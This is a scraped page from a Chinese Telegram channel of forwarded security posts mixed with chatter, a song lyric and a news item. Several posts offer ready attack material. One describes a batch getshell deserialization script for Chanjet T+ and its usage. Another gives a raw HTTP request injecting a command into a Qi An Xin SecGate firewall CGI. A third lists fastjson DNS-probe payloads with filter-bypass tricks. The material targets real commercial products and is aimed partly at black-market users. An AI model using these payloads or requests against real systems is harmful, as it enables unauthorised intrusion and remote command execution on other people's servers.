踹哈公寓 – Telegram
踹哈公寓
4.11K subscribers
589 photos
19 videos
307 files
357 links
Download Telegram
Forwarded from 黄豆
畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController反序列化批量检测脚本

用法
python exp.py -u url
python exp.py -f url.txt
TG上许多圈哥都在发的xx一键批量getshell傻瓜式工具,我也写了一个,GPT就能搓的东西,GitHub也有上一堆免费的真没必要去傻乎乎的爆金币

用法 -u 单个url
-f txt
-t指定线程,默认为50

黑产哥可能要问了,孩子shell传上去了密码是多少呢?国内漏洞我还是怕出事,就不告诉你,自己扒拉源码翻吧
🥰4
https://www.secrss.com/articles/64457

🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🤓Never let you go,it's why I did them all🤓
For a chance at least~~🎻, to live in your way🎻🎻
Love of you👿 is my most cherished thing😭😭😭😭
😡👊🏻So stay alive, bravely.
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶
👍2🥴1
Channel photo updated
Channel name was changed to «大鸟转转转酒吧»
奇安信网神SecGate 3600 A1500 防火墙存在前台命令执行漏洞

POST /cgi-bin/sysTools/sysToolsDetectNet.cgi HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequesttargetHost=|ping|
👍31
自我介绍
🤡18
😁3
fastjson默认配置测试版本payload

payload 1(dns请求)【fastjson>=1.2.37】

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://§1§.{{URL}}"}}""}
1.2.37-1.2.83版本

payload 2(dns请求)【fastjson>=1.2.37】

{{"@type":"java.net.URL","val":"http://§1§.{{URL}}"}:0
1.2.37-1.2.83版本

bypass字符,\a、\n、\b、\r、\f、\t 等,十六进制编码。把字符串中的0x07以及0x0b去除,可以加在"@type":"java.net.InetSocketAddress"不影响json的解析,反之,则会造成500错误

poc2jar工具里也有json漏洞poc能做大致判断
https://github.com/f0ng/poc2jar
1
3月15日,91短视频官方、51成人漫画、海角乱伦社区官方等色情平台在X上对河北邯郸霸凌事件表态
😁18👍31
https://mp.weixin.qq.com/s/LhRHy9aHphXopZBdoF6ILg

哈批,一堆免费的还让你圈上了
人家github开源工具允许你免费下载用允许你转手拿来商用吗
🤡9👍2